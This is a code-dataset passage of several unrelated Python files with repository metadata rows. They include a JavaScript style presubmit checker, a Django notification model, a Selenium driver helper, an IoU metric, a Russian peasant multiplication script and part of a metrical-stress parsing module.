    :param status: string Status key
    """
    description = OFFERS_STATUSES.get(status, status)
    return description
| 16.136364 | 48 | 0.692958 | 0 | 0 | 0 | 0 | 180 | 0.507042 | 0 | 0 | 144 | 0.405634 |
d5a3714f67fe62a722e814c6e434ce5613a21bbc | 3,400 | py | Python | catapult_build/js_checks.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 1 | 2019-01-04T10:08:58.000Z | 2019-01-04T10:08:58.000Z | catapult_build/js_checks.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 6 | 2020-07-19T21:51:44.000Z | 2022-02-13T08:22:58.000Z | catapult_build/js_checks.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 1 | 2020-07-24T18:22:03.000Z | 2020-07-24T18:22:03.000Z | # Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import eslint
from py_vulcanize import strip_js_comments
from catapult_build import parse_html
class JSChecker(object):
  """Presubmit checker for JavaScript (and inline-JS HTML) files."""

  def __init__(self, input_api, output_api, file_filter=None):
    self.input_api = input_api
    self.output_api = output_api
    if file_filter:
      self.file_filter = file_filter
    else:
      # No filter supplied: accept every file.
      self.file_filter = lambda x: True

  def RunChecks(self):
    """Checks for violations of the Chromium JavaScript style guide.

    See:
    http://chromium.org/developers/web-development-style-guide#TOC-JavaScript
    """
    results = []
    affected_files = self.input_api.AffectedFiles(
        file_filter=self.file_filter,
        include_deletes=False)

    def ShouldCheck(f):
      # Only .js and .html files are checked.
      if f.LocalPath().endswith('.js'):
        return True
      if f.LocalPath().endswith('.html'):
        return True
      return False

    affected_js_files = [f for f in affected_files if ShouldCheck(f)]
    error_lines = []
    # First pass: 'use strict' check on each affected file.
    for f in affected_js_files:
      contents = list(f.NewContents())
      error_lines += CheckStrictMode(
          '\n'.join(contents),
          is_html_file=f.LocalPath().endswith('.html'))
    # Second pass: run eslint over all affected files at once.
    if affected_js_files:
      success, eslint_output = eslint.RunEslint(
          [f.AbsoluteLocalPath() for f in affected_js_files])
      if not success:
        error_lines.append('\neslint found lint errors:')
        error_lines.append(eslint_output)
    if error_lines:
      error_lines.insert(0, 'Found JavaScript style violations:')
      results.append(
          _MakeErrorOrWarning(self.output_api, '\n'.join(error_lines)))
    return results
def _ErrorHighlight(start, length):
"""Produces a row of '^'s to underline part of a string."""
return start * ' ' + length * '^'
def _MakeErrorOrWarning(output_api, error_text):
return output_api.PresubmitError(error_text)
def CheckStrictMode(contents, is_html_file=False):
  """Returns error messages for scripts whose first statement is not
  'use strict'."""
  if is_html_file:
    statements_to_check = list(_FirstStatementsInScriptElements(contents))
  else:
    statements_to_check = [_FirstStatement(contents)]
  errors = []
  for statement in statements_to_check:
    if statement != "'use strict'":
      errors.append('Expected "\'use strict\'" as first statement, '
                    'but found "%s" instead.' % statement)
  return errors
def _FirstStatementsInScriptElements(contents):
  """Returns a list of first statements found in each <script> element."""
  soup = parse_html.BeautifulSoup(contents)
  # Only inline scripts (no src attribute) are considered.
  inline_scripts = soup.find_all('script', src=None)
  return [_FirstStatement(element.get_text()) for element in inline_scripts]
def _FirstStatement(contents):
  """Extracts the first statement in some JS source code."""
  stripped = strip_js_comments.StripJSComments(contents).strip()
  match = re.match('^(.*?);', stripped, re.DOTALL)
  if not match:
    # No semicolon-terminated statement at all.
    return ''
  return match.group(1).strip()
def RunChecks(input_api, output_api, excluded_paths=None):
  """Runs the JS style checks over all affected, non-excluded files."""
  def ShouldCheck(affected_file):
    if not excluded_paths:
      return True
    path = affected_file.LocalPath()
    return not any(re.match(pattern, path) for pattern in excluded_paths)

  checker = JSChecker(input_api, output_api, file_filter=ShouldCheck)
  return checker.RunChecks()
| 29.824561 | 78 | 0.704118 | 1,502 | 0.441765 | 0 | 0 | 0 | 0 | 0 | 0 | 716 | 0.210588 |
d5a40db4f8292b174efc5944ace79eb384db16eb | 1,919 | py | Python | care/facility/models/notification.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 189 | 2020-03-17T17:18:58.000Z | 2022-02-22T09:49:45.000Z | care/facility/models/notification.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 598 | 2020-03-19T21:22:09.000Z | 2022-03-30T05:08:37.000Z | care/facility/models/notification.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 159 | 2020-03-19T18:45:56.000Z | 2022-03-17T13:23:12.000Z | import enum
from django.db import models
from care.facility.models import FacilityBaseModel
from care.users.models import User
from django.contrib.postgres.fields import JSONField
class Notification(FacilityBaseModel):
    """A notification sent to a user, with its medium, event, and read state."""

    class EventType(enum.Enum):
        # Whether the notification was produced by the system or typed by a user.
        SYSTEM_GENERATED = 50
        CUSTOM_MESSAGE = 100

    EventTypeChoices = [(e.value, e.name) for e in EventType]

    class Medium(enum.Enum):
        # Delivery channel of the notification.
        SYSTEM = 0
        SMS = 100
        WHATSAPP = 200

    MediumChoices = [(e.value, e.name) for e in Medium]

    class Event(enum.Enum):
        # Domain event that triggered the notification.
        MESSAGE = 0
        PATIENT_CREATED = 20
        PATIENT_UPDATED = 30
        PATIENT_DELETED = 40
        PATIENT_CONSULTATION_CREATED = 50
        PATIENT_CONSULTATION_UPDATED = 60
        PATIENT_CONSULTATION_DELETED = 70
        INVESTIGATION_SESSION_CREATED = 80
        INVESTIGATION_UPDATED = 90
        PATIENT_FILE_UPLOAD_CREATED = 100
        CONSULTATION_FILE_UPLOAD_CREATED = 110
        PATIENT_CONSULTATION_UPDATE_CREATED = 120
        PATIENT_CONSULTATION_UPDATE_UPDATED = 130
        PATIENT_CONSULTATION_ASSIGNMENT = 140
        SHIFTING_UPDATED = 200

    EventChoices = [(e.value, e.name) for e in Event]

    # Recipient of the notification (kept with NULL if the user is deleted).
    intended_for = models.ForeignKey(
        User, on_delete=models.SET_NULL, null=True, related_name="notification_intended_for",
    )
    medium_sent = models.IntegerField(choices=MediumChoices, default=Medium.SYSTEM.value)
    # User whose action produced the notification.
    caused_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, related_name="notification_caused_by",)
    # Timestamp at which the recipient read the notification (NULL = unread).
    read_at = models.DateTimeField(null=True, blank=True)
    event_type = models.IntegerField(choices=EventTypeChoices, default=EventType.SYSTEM_GENERATED.value)
    event = models.IntegerField(choices=EventChoices, default=Event.MESSAGE.value)
    message = models.TextField(max_length=2000, null=True, default=None)
    # Arbitrary JSON payload describing the objects involved in the event.
    caused_objects = JSONField(null=True, blank=True, default=dict)
| 36.207547 | 117 | 0.72173 | 1,734 | 0.903596 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.026576 |
d5a4573d5ae49df24e84bfdf833cc441272c4eb6 | 176 | py | Python | services/startDriver.py | nayfaan/Google_rank_find | 77815b0f710ec4456f70a63b3359c02fd24753a8 | [
"MIT"
] | null | null | null | services/startDriver.py | nayfaan/Google_rank_find | 77815b0f710ec4456f70a63b3359c02fd24753a8 | [
"MIT"
] | null | null | null | services/startDriver.py | nayfaan/Google_rank_find | 77815b0f710ec4456f70a63b3359c02fd24753a8 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium import *
def start():
    """Launch a Chrome WebDriver using the bundled chromedriver binary."""
    driver_path = './services/chromedriver'
    return webdriver.Chrome(executable_path=driver_path)
if __name__ == "__main__":
pass
| 19.555556 | 70 | 0.744318 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 35 | 0.198864 |
d5a49556f65c7eab6e09e8c16d7151af12063b65 | 87 | py | Python | Chapter11/grades_ms/grades/grades_svc/admin.py | MichaelRW/Python-for-Geeks | a111f61f1a0b077fc0524431e1ccefd9214d5c53 | [
"MIT"
] | 31 | 2020-08-10T22:37:41.000Z | 2022-03-09T21:35:56.000Z | Chapter11/grades_ms/grades/grades_svc/admin.py | MichaelRW/Python-for-Geeks | a111f61f1a0b077fc0524431e1ccefd9214d5c53 | [
"MIT"
] | null | null | null | Chapter11/grades_ms/grades/grades_svc/admin.py | MichaelRW/Python-for-Geeks | a111f61f1a0b077fc0524431e1ccefd9214d5c53 | [
"MIT"
] | 21 | 2020-08-10T22:37:44.000Z | 2022-03-07T07:26:28.000Z | from django.contrib import admin
from .models import Grade
admin.site.register(Grade)
| 17.4 | 32 | 0.816092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d5a523e97c8871c1b7a642d8e7e1284f0ce9a2ec | 1,492 | py | Python | tracksuite/utils/metrics.py | jimiolaniyan/tracksuite | f05c40e7b78ce2bb623a4ae76c08997a41585152 | [
"MIT"
] | null | null | null | tracksuite/utils/metrics.py | jimiolaniyan/tracksuite | f05c40e7b78ce2bb623a4ae76c08997a41585152 | [
"MIT"
] | 1 | 2020-09-02T07:53:51.000Z | 2020-09-02T07:53:51.000Z | tracksuite/utils/metrics.py | jimiolaniyan/tracksuite | f05c40e7b78ce2bb623a4ae76c08997a41585152 | [
"MIT"
] | null | null | null | import numpy as np
def calculate_iou(bboxes1, bboxes2):
    """
    This calculates the intersection over union of N bounding boxes
    in the form N x [left, top, right, bottom], e.g for N=2:
    >> bb = [[21,34,45,67], [67,120, 89, 190]]
    :param bboxes1: np array: N x 4 ground truth bounding boxes
    :param bboxes2: np array: N x 4 target bounding boxes
    :return: iou: ratio between 0 and 1
    """
    # Promote 1-D inputs (a single box) to shape (1, 4).
    if len(bboxes1.shape) == 1:
        bboxes1 = bboxes1.reshape(1, bboxes1.shape[0])
    if len(bboxes2.shape) == 1:
        bboxes2 = bboxes2.reshape(1, bboxes2.shape[0])
    if bboxes1.shape[0] != bboxes2.shape[0] or bboxes1.shape[1] != bboxes2.shape[1]:
        raise ValueError('Bounding boxes must be of equal dimension')

    left_intersection = np.maximum(bboxes1[:, 0], bboxes2[:, 0])
    top_intersection = np.maximum(bboxes1[:, 1], bboxes2[:, 1])
    right_intersection = np.minimum(bboxes1[:, 2], bboxes2[:, 2])
    bottom_intersection = np.minimum(bboxes1[:, 3], bboxes2[:, 3])

    # BUGFIX: clamp the intersection extents at zero. For disjoint boxes
    # both extents can be negative, and their product used to come out as
    # a *positive* intersection area (e.g. [0,0,2,2] vs [4,4,5,5] yielded
    # IoU 1.0 after clipping).
    w_intersection = np.maximum(right_intersection - left_intersection, 0)
    h_intersection = np.maximum(bottom_intersection - top_intersection, 0)
    intersection_area = w_intersection * h_intersection

    bboxes1_area = (bboxes1[:, 2] - bboxes1[:, 0]) * (bboxes1[:, 3] - bboxes1[:, 1])
    bboxes2_area = (bboxes2[:, 2] - bboxes2[:, 0]) * (bboxes2[:, 3] - bboxes2[:, 1])
    union_area = bboxes1_area + bboxes2_area - intersection_area

    iou = np.clip(intersection_area/union_area, 0, 1)
    return iou
d5a7dc8916eb01cb85de2b374c6b24801f3724ff | 2,027 | py | Python | Python/RussianPeasantMult.py | sheenxavi004/problem-solving | 8541ed52ff1f17031a2190b18dd5b128dd334c2d | [
"MIT"
] | 11 | 2018-10-03T23:57:04.000Z | 2020-04-04T05:06:15.000Z | Python/RussianPeasantMult.py | sheenxavi004/problem-solving | 8541ed52ff1f17031a2190b18dd5b128dd334c2d | [
"MIT"
] | 28 | 2018-10-04T07:31:07.000Z | 2020-01-08T15:43:28.000Z | Python/RussianPeasantMult.py | sheenxavi004/problem-solving | 8541ed52ff1f17031a2190b18dd5b128dd334c2d | [
"MIT"
] | 78 | 2018-10-04T06:28:58.000Z | 2021-12-12T07:07:13.000Z | """
Russian Peasant Multiplication (RPM) Algorithm Implemented In Python
RPM is a method of mutiplication of any 2 numbers using only multiplication
and division by 2.
The basics are that you divide the second number by 2 (integer division) until
it equals 1, every time you divide the second number by 2, you also multiply
the first number by 2. After the second number hits 1, you then remove all right
side values that are even. Finally you add all of the left side values that are
left.
EXAMPLE:
10*5:
10 5 <== We add left side value (10) to total
10*2=20 5/2=2 <== We don't use this line since int(5/2) is an even number
20*2=40 2/2=1 <== We add left side value (40) to total
10 + 40 = 50
10 * 5 = 50
"""
import sys
def RPMult(x, y):
    """Multiply x by y using the Russian Peasant algorithm.

    Repeatedly halves y (integer division) and doubles x; the product is
    the sum of the x values paired with an odd y. Generalized to also
    handle negative and zero multipliers (the original returned 0 for
    negative y); behavior for y >= 0 is unchanged.
    """
    if y < 0:
        # Peasant halving only works for non-negative y; factor out the sign.
        return -RPMult(x, -y)
    total = 0
    while y >= 1:
        if y % 2 == 1:
            # Odd right-hand values contribute their left-hand partner.
            total += x
        y = y // 2
        x = x * 2
    return total
def main():
    """Parse two integer CLI arguments and print their RPM product."""
    argv = sys.argv[1:]
    if len(argv) != 2:
        # Wrong argument count: show usage and bail out.
        print("Error please pass two integer values!")
        print("Usage: python RussianPeasantMult.py <int1> <int2>")
        return
    try:
        first, second = (int(value) for value in argv)
    except ValueError:
        print("Error: You can only pass integer values to program")
        return
    print(RPMult(first, second))
if __name__ == "__main__":
main() | 32.174603 | 80 | 0.618155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,322 | 0.652195 |
d5a7f3dd6c594271ad5f5ffe349ea681ebe4fe26 | 34,989 | py | Python | celery-queue/metrical-tree/metricaltree.py | HwanSolo/stanford-linguistics | c3a7e7452dacca9c1d4bfde1667b82596193b434 | [
"Apache-2.0"
] | null | null | null | celery-queue/metrical-tree/metricaltree.py | HwanSolo/stanford-linguistics | c3a7e7452dacca9c1d4bfde1667b82596193b434 | [
"Apache-2.0"
] | null | null | null | celery-queue/metrical-tree/metricaltree.py | HwanSolo/stanford-linguistics | c3a7e7452dacca9c1d4bfde1667b82596193b434 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python # -*- coding: utf-8 -*-
import argparse
import codecs
import os
import re
import sys
import cPickle as pkl
from collections import defaultdict

import matplotlib.pyplot as plt
import nltk
import nltk.data
import numpy as np
import pandas as pd
from nltk import compat
from nltk.tree import Tree

from deptree import DependencyTree, DependencyTreeParser
def Get_script_directory():
    """Return the absolute path of the directory containing this script."""
    return os.path.dirname(os.path.abspath(__file__))
# Release date / version strings used to locate the bundled Stanford jars.
DATE = '2015-04-20'
MODELS_VERSION = '3.5.2'
EJML_VERSION = '0.23'
script_dir = Get_script_directory()
# Point the NLTK Stanford wrappers at the bundled parser jars.
os.environ['STANFORD_PARSER'] = os.path.join(
    script_dir, 'stanford-library/stanford-parser-full-%s/stanford-parser.jar' % DATE)
os.environ['STANFORD_MODELS'] = os.path.join(script_dir, 'stanford-library/stanford-parser-full-%s/stanford-parser-%s-models.jar' % (
    DATE, MODELS_VERSION))
os.environ['STANFORD_EJML'] = os.path.join(script_dir, 'stanford-library/stanford-parser-full-%s/ejml-%s.jar' % (
    DATE, EJML_VERSION))
# Syllable dictionary: maps lowercase word -> (segments, per-syllable stress
# info) -- presumably derived from CMUdict; see MetricalTree.__init__ usage.
# Fix: open the pickle in binary mode and close the handle (the original
# used pkl.load(open(...)), leaking the file object).
pickle_path = os.path.join(script_dir, "pickle_jar", "sylcmu.pkl")
with open(pickle_path, 'rb') as pickle_file:
    sylcmu = pkl.load(pickle_file)
sent_splitter = nltk.data.load('tokenizers/punkt/english.pickle')
def Extant_file(value):
    """argparse type-checker: accept a path only if it exists (not opened)."""
    if os.path.exists(value):
        return value
    raise argparse.ArgumentTypeError("{0} does not exist".format(value))
def Replace_dashes_with_underscores(string):
    """Return *string* with every '-' swapped for '_'."""
    return "_".join(string.split("-"))
def Validate_arguments():
    """Build the command-line parser and return the parsed arguments."""
    arg_parser = argparse.ArgumentParser(
        description='Compute T-orders in constraint-based phonology')
    arg_parser.add_argument("-f", "--input-file", dest="input",
                            help="input txt file", metavar="<FILEPATH>", type=Extant_file)
    arg_parser.add_argument("-o", "--output", dest="output_directory",
                            help="output path for results (default: current script directory)", metavar="<FILEPATH>")
    # The six word/tag/dep list options are symmetric; generate them in the
    # same order the original declared them.
    for prefix in ("unstressed", "ambiguous"):
        for noun in ("words", "tags", "deps"):
            option = "%s_%s" % (prefix, noun)
            arg_parser.add_argument("--" + option, dest=option, default=[], nargs='+',
                                    help="List of strings to use for %s %s" % (prefix, noun))
    arg_parser.add_argument("--stressed_words", dest="stressed_words", default=[],
                            nargs='+', help="List of strings to use for stressed words")
    return arg_parser.parse_args()
def Create_directory(directory):
    """Create *directory* (with parents) unless it already exists."""
    if os.path.exists(directory):
        return
    os.makedirs(directory)
def Set_output_directory(directory):
    """Return the output directory (creating it), or the script dir if unset."""
    if not directory:
        return Get_script_directory()
    Create_directory(directory)
    return directory
# =================================================================================================
# Entrypoint
# =================================================================================================
# NOTE(review): argument parsing runs at import time, so importing this
# module consumes sys.argv (and may exit on bad arguments) -- confirm the
# module is only ever executed as a script.
args = Validate_arguments()
# =================================================================================================
# Optional parameters
# =================================================================================================
# Trailing "/" so later code can build paths by simple concatenation.
output_prefix = Set_output_directory(args.output_directory) + "/"
# Word/tag/dependency override lists consumed by the MetricalTree class
# attributes defined below.
unstressed_words = args.unstressed_words
unstressed_tags = args.unstressed_tags
unstressed_deps = args.unstressed_deps
ambiguous_words = args.ambiguous_words
ambiguous_tags = args.ambiguous_tags
ambiguous_deps = args.ambiguous_deps
stressed_words = args.stressed_words
# ***********************************************************************
# Multiprocessing worker
def parse_worker(q):
    """Worker-process loop: parse each queued text file into results.csv.

    Consumes filenames from queue *q* until the 'STOP' sentinel arrives.
    Each file is split into sentence chunks, parsed with the Stanford PCFG
    model, and the per-word stress statistics table is written out.

    NOTE(review): every file (and every worker process) writes to the same
    <output_prefix>/results.csv path, so later files overwrite earlier
    output -- confirm that a single input file is the expected use case.
    """
    parser = DependencyTreeParser(
        model_path=os.path.join(script_dir, 'stanford-library/stanford-parser-full-%s/edu/stanford/nlp/models/lexparser/englishPCFG.ser.gz' % DATE))
    parser = MetricalTreeParser(parser)
    for filename in iter(q.get, 'STOP'):
        sents = []
        with codecs.open(filename, encoding='utf-8') as f:
            for line in f:
                sents.extend(pause_splitter(line))
        df = parser.stats_raw_parse_sents(sents, arto=True)
        output_path = os.path.join(output_prefix, 'results.csv')
        df.to_csv(codecs.open(output_path, 'w', encoding='utf-8'), index=False)
    return True
# ***********************************************************************
# Split a text on certain punctuation
def pause_splitter(s):
    """Split a text into sentence-like chunks, also breaking at pauses.

    A newline is inserted after pause punctuation (colon, semicolon, or a
    run of two or more dashes), the text is split on newlines, and each
    piece is further split into sentences by the Punkt sentence tokenizer.
    """
    # Local import: module level previously only imported "re" inside the
    # __main__ guard, which breaks this function when the module is imported
    # (or under multiprocessing "spawn").  The local import is always safe.
    import re
    s = s.strip()
    # \g<1> keeps the matched punctuation, then forces a break after it.
    s = re.sub('([:;]|--+)', '\\g<1>\n', s)
    s = s.split('\n')
    s = [sent for sents in s for sent in sent_splitter.tokenize(sents)]
    return s
# ***********************************************************************
# Metrical Tree class
class MetricalTree(DependencyTree):
    """Dependency tree whose nodes carry metrical stress annotations.

    Three stress values are tracked per node:
      * lstress -- lexical stress: 0 (stressed), -1 (unstressed),
        -.5 (ambiguous), or NaN for punctuation/contractables
      * pstress -- phrasal stress assigned over the whole tree
      * stress  -- cumulative total (lstress + pstress + parent total)
    """

    # Word/tag/dependency classes that control lexical stress assignment.
    # Populated from the CLI options parsed above; the old hard-coded
    # defaults were removed because the application wrapper manages them.
    _unstressedWords = tuple() if not unstressed_words else tuple(
        unstressed_words)
    _unstressedTags = tuple() if not unstressed_tags else tuple(unstressed_tags)
    _unstressedDeps = tuple() if not unstressed_deps else tuple(unstressed_deps)
    _ambiguousWords = tuple() if not ambiguous_words else tuple(ambiguous_words)
    _ambiguousTags = tuple() if not ambiguous_tags else tuple(ambiguous_tags)
    _ambiguousDeps = tuple() if not ambiguous_deps else tuple(ambiguous_deps)
    _stressedWords = tuple() if not stressed_words else tuple(stressed_words)

    def __init__(self, node, children, dep=None, lstress=0, pstress=np.nan, stress=np.nan):
        """Build the node, then attach syllable info for known preterminals."""
        self._lstress = lstress
        self._pstress = pstress
        self._stress = stress
        super(MetricalTree, self).__init__(node, children, dep)
        self.set_label()
        if self._preterm:
            if self[0].lower() in sylcmu:
                syll_info = sylcmu[self[0].lower()]
                self._seg = syll_info[0]
                self._nsyll = len(syll_info[1])
                # Count syllables marked with primary ('P') or secondary
                # ('S') stress.  (List comprehension instead of
                # len(filter(...)) so the code also works on Python 3.)
                self._nstress = len(
                    [syll for syll in syll_info[1] if syll[1] in ('P', 'S')])
            else:
                # Word not in the syllable dictionary: no segment data.
                self._seg = None
                self._nsyll = np.nan
                self._nstress = np.nan

    def lstress(self):
        """Return the node's lexical stress."""
        return self._lstress

    def pstress(self):
        """Return the node's phrasal stress."""
        return self._pstress

    def stress(self):
        """Return the node's total (cumulative) stress."""
        return self._stress

    def seg(self):
        """Return the node's segments, or an empty list if unknown."""
        return self._seg if self._seg is not None else []

    def nseg(self):
        """Return the number of segments, or NaN if unknown."""
        return len(self._seg) if self._seg is not None else np.nan

    def nsyll(self):
        """Return the number of syllables (NaN if unknown)."""
        return self._nsyll

    def nstress(self):
        """Return the number of stressed syllables (NaN if unknown)."""
        return self._nstress

    def lstresses(self, leaves=True):
        """Yield lexical stress per preterminal; with leaves, pair with word."""
        for preterminal in self.preterminals(leaves=True):
            if leaves:
                yield (preterminal._lstress, preterminal[0])
            else:
                yield preterminal._lstress

    def pstresses(self, leaves=True):
        """Yield phrasal stress per preterminal; with leaves, pair with word."""
        for preterminal in self.preterminals(leaves=True):
            if leaves:
                yield (preterminal._pstress, preterminal[0])
            else:
                yield preterminal._pstress

    def stresses(self, leaves=True, arto=False):
        """Yield total stress per preterminal, optionally in "arto" form.

        In arto form unstressed words map to 0 and other totals are flipped
        and shifted (-(stress - 1)) so larger numbers mean more stress.
        """
        for preterminal in self.preterminals(leaves=True):
            if leaves:
                if arto:
                    if preterminal._stress is None:
                        yield (None, preterminal[0])
                    elif preterminal._lstress == -1:
                        yield (0, preterminal[0])
                    else:
                        yield (-(preterminal._stress-1), preterminal[0])
                else:
                    yield (preterminal._stress, preterminal[0])
            else:
                if arto:
                    if preterminal._stress is None:
                        yield None
                    elif preterminal._lstress == -1:
                        yield 0
                    else:
                        yield -(preterminal._stress-1)
                else:
                    yield preterminal._stress

    def nsylls(self, leaves=True):
        """Yield syllable counts per preterminal; with leaves, pair with word."""
        for preterminal in self.preterminals(leaves=True):
            if leaves:
                yield (preterminal._nsyll, preterminal[0])
            else:
                yield preterminal._nsyll

    def set_lstress(self):
        """Assign lexical stress to every preterminal from the class lists."""
        if self._preterm:
            if self[0].lower() in super(MetricalTree, self)._contractables:
                self._lstress = np.nan
            elif self._cat in super(MetricalTree, self)._punctTags:
                self._lstress = np.nan
            elif self[0].lower() in MetricalTree._unstressedWords:
                self._lstress = -1
            elif self[0].lower() in MetricalTree._ambiguousWords:
                self._lstress = -.5
            elif self[0].lower() in MetricalTree._stressedWords:
                self._lstress = 0
            elif self._cat in MetricalTree._unstressedTags:
                self._lstress = -1
            elif self._cat in MetricalTree._ambiguousTags:
                self._lstress = -.5
            elif self._dep in MetricalTree._unstressedDeps:
                self._lstress = -1
            elif self._dep in MetricalTree._ambiguousDeps:
                self._lstress = -.5
            else:
                self._lstress = 0
            # Determiner "that" is always treated as ambiguous.
            if self[0].lower() == 'that' and (self._cat == 'DT' or self._dep == 'det'):
                self._lstress = -.5
        else:
            for child in self:
                child.set_lstress()
        self.set_label()

    def set_pstress(self):
        """Assign phrasal stress bottom-up (tree must be disambiguated)."""
        # Basis
        if self._preterm:
            # Explicit check instead of the original bare try/assert/except:
            # asserts vanish under -O and a bare except hides real errors.
            if self._lstress == -.5:
                raise ValueError(
                    'The tree must be disambiguated before assigning phrasal stress')
            self._pstress = self._lstress
        else:
            # Recurse
            for child in self:
                child.set_pstress()
            assigned = False
            # Noun compounds (look for sequences of N*): in a right-to-left
            # scan the *second* N* from the right receives the stress.
            if self._cat == 'NP':
                skipIdx = None
                i = len(self)
                for child in self[::-1]:
                    i -= 1
                    if child._cat.startswith('NN'):
                        if not assigned and skipIdx is None:
                            skipIdx = i
                            child._pstress = -1
                            child.set_label()
                        elif not assigned:
                            child._pstress = 0
                            child.set_label()
                            assigned = True
                        else:
                            child._pstress = -1
                            child.set_label()
                    elif assigned:
                        child._pstress = -1
                        child.set_label()
                    else:
                        if not assigned and skipIdx is not None:
                            self[skipIdx]._pstress = 0
                            self[skipIdx].set_label()
                            assigned = True
                            child._pstress = -1
                            child.set_label()
                        else:
                            break
                if not assigned and skipIdx is not None:
                    self[skipIdx]._pstress = 0
                    self[skipIdx].set_label()
                    assigned = True
            # Everything else: rightmost stressed child keeps the stress.
            if not assigned:
                for child in self[::-1]:
                    if not assigned and child._pstress == 0:
                        assigned = True
                    elif not np.isnan(child._pstress):
                        child._pstress = -1
                        child.set_label()
            if not assigned:
                self._pstress = -1
            else:
                self._pstress = 0
            self.set_label()

    def set_stress(self, stress=0):
        """Propagate the cumulative stress total down the tree."""
        self._stress = self._lstress + self._pstress + stress
        if not self._preterm:
            for child in self:
                child.set_stress(self._stress)
        self.set_label()

    def set_label(self):
        """Rebuild the display label (cat < dep < lstress < pstress < stress).

        NOTE(review): the "is not np.nan" identity tests only detect the
        np.nan singleton; a NaN produced by arithmetic is a different float
        object and still gets printed -- confirm this is intended.
        """
        if self._stress is not np.nan:
            self._label = '%s/%s' % (self._cat, self._stress)
        elif self._pstress is not np.nan:
            self._label = '%s/%s' % (self._cat, self._pstress)
        elif self._lstress is not np.nan:
            self._label = '%s/%s' % (self._cat, self._lstress)
        elif self._dep is not None:
            self._label = '%s/%s' % (self._cat, self._dep)
        else:
            self._label = '%s' % self._cat

    @classmethod
    def convert(cls, tree):
        """
        Convert a tree between different subtypes of Tree. ``cls`` determines
        which class will be used to encode the new tree.

        :type tree: Tree
        :param tree: The tree that should be converted.
        :return: The new Tree.
        """
        if isinstance(tree, Tree):
            children = [cls.convert(child) for child in tree]
            if isinstance(tree, MetricalTree):
                return cls(tree._cat, children, tree._dep, tree._lstress)
            elif isinstance(tree, DependencyTree):
                return cls(tree._cat, children, tree._dep)
            else:
                return cls(tree._label, children)
        else:
            return tree

    def ambiguity(self, stress_polysyll=False):
        """Count ambiguous preterminals (optionally only monosyllabic ones)."""
        nambig = 0
        for preterminal in self.preterminals():
            if preterminal.lstress() == -.5:
                if not stress_polysyll or (preterminal.nsyll() == 1):
                    nambig += 1
        return nambig

    def disambiguate(self, stress_polysyll=False):
        """Return all trees obtainable by resolving each ambiguous word.

        Each -.5 preterminal is expanded into an unstressed and a stressed
        copy (polysyllabic words only get the stressed copy when
        *stress_polysyll* is set).  The node itself is left unchanged.

        Bug fix: the recursive step previously called the nonexistent
        ``child.disambiguate(syll)`` with an undefined variable (the method
        was named ``ambiguate``), so any recursion raised NameError and
        MetricalTreeParser's calls to ``disambiguate`` raised AttributeError.
        """
        if self._preterm:
            if self._lstress != -.5:
                return [self.copy()]
            else:
                alts = []
                if not stress_polysyll or self._nsyll == 1:
                    self._lstress = -1
                    alts.append(self.copy())
                self._lstress = 0
                alts.append(self.copy())
                self._lstress = -.5
                return alts
        else:
            # Cartesian product of the children's alternatives.
            alts = [[]]
            for child in self:
                child_alts = child.disambiguate(stress_polysyll)
                for i in xrange(len(alts)):
                    alt = alts.pop(0)
                    for child_alt in child_alts:
                        alts.append(alt + [child_alt])
            return [MetricalTree(self._cat, alt, self._dep) for alt in alts]

    # Backward-compatible alias: earlier revisions exposed this method under
    # the name "ambiguate".
    ambiguate = disambiguate

    def max_stress_disambiguate(self):
        """Return the tree(s) with every ambiguous word made stressed."""
        if self._preterm:
            if self._lstress != -.5:
                return [self.copy()]
            else:
                alts = []
                self._lstress = 0
                alts.append(self.copy())
                self._lstress = -.5
                return alts
        else:
            alts = [[]]
            for child in self:
                child_alts = child.max_stress_disambiguate()
                for i in xrange(len(alts)):
                    alt = alts.pop(0)
                    for child_alt in child_alts:
                        alts.append(alt + [child_alt])
            return [MetricalTree(self._cat, alt, self._dep) for alt in alts]

    def min_stress_disambiguate(self, stress_polysyll=False):
        """Return the tree(s) with ambiguous words made unstressed.

        With *stress_polysyll*, only monosyllabic ambiguous words become
        unstressed; polysyllabic ones are stressed instead.
        """
        if self._preterm:
            if self._lstress != -.5:
                return [self.copy()]
            else:
                alts = []
                if not stress_polysyll or self._nsyll == 1:
                    self._lstress = -1
                else:
                    self._lstress = 0
                alts.append(self.copy())
                self._lstress = -.5
                return alts
        else:
            alts = [[]]
            for child in self:
                child_alts = child.min_stress_disambiguate(stress_polysyll)
                for i in xrange(len(alts)):
                    alt = alts.pop(0)
                    for child_alt in child_alts:
                        alts.append(alt + [child_alt])
            return [MetricalTree(self._cat, alt, self._dep) for alt in alts]

    def copy(self, deep=False):
        """Return a shallow copy (sharing children) or a deep converted copy."""
        if not deep:
            return type(self)(self._cat, self, dep=self._dep, lstress=self._lstress)
        else:
            return type(self).convert(self)
# ***********************************************************************
# Parser for Metrical Trees
class MetricalTreeParser(object):
    """Wraps a Stanford DependencyTreeParser to build MetricalTree analyses.

    The ``dep_*`` methods delegate to the underlying parser, the ``lex_*``
    methods additionally convert results to MetricalTree and assign lexical
    stress, the ``phr_*`` methods disambiguate and assign phrasal/total
    stress, and the ``stats_*`` methods tabulate per-word statistics.
    """

    def __init__(self, deptreeParser=None):
        """Store (or construct) the dependency-tree parser to delegate to.

        *deptreeParser* may be a DependencyTreeParser instance or a model
        name string such as 'PCFG'.
        """
        if deptreeParser is None:
            sys.stderr.write('No deptreeParser provided, defaulting to PCFG\n')
            deptreeParser = 'PCFG'
